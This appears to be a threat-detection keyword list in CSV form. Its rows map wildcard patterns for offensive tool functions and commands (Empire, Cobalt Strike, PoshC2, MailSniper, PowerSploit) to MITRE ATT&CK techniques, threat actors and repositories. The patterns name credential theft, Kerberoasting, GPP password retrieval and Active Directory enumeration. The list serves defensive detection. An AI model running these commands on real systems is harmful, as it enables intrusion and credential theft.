Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainObjectACL -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainSearcher*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetDomainsForEnumeration*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Get-DomainSpn*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SQLInstanceDomain.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getdomainspnticket*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-DomainSPNTicket*,offensive_tool_keyword,BloodHound,Kerberoasting With PowerView,T1558 - T1208 - T1552,TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*Get-DomainSPNTicket*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z 
-*Get-DomainSPNTicket*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainSPNTicket*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainUser -KerberosPreuthNotRequired -Verbose*,greyware_tool_keyword,powershell,Powerview Enumerate users,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DomainUser -TrustedToAuth | select userprincipalname,offensive_tool_keyword,AD exploitation cheat sheet,msds-allowedtodelegateto*,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DXWebcamVideo.ps1*,offensive_tool_keyword,SharpDXWebcam,Utilizing DirectX and DShowNET assemblies 
to record video from a host's webcam,T1123 - T1059.001 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/snovvcrash/SharpDXWebcam,1,1,N/A,8,1,68,10,2023-07-19T21:09:00Z,2023-07-12T03:26:24Z -*getent passwd | cut -d: -f1*,greyware_tool_keyword,getent,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ExchangeAccessToken*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Get-ExoPsAccessToken*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*getExploit.py*,offensive_tool_keyword,getExploit,Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.,T1587 - T1068 - T1211 - T1210 - T1588,TA0006 - TA0002 - TA0009 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Gioyik/getExploit,1,1,N/A,N/A,1,43,27,2015-06-26T16:38:55Z,2015-01-03T03:26:21Z -*getexploitablesystem*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Get-ExploitableSystem*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt 
Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Get-ExploitableSystem*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-ExploitableUnquotedPath*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-FakeServiceUsers*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Get-FireFoxHistory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-FoxDump*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-FoxDump*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getgppgroups *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-GPPInnerFields*,offensive_tool_keyword,empire,Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getgpppassword *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-GPPPassword -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Get-GPPPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 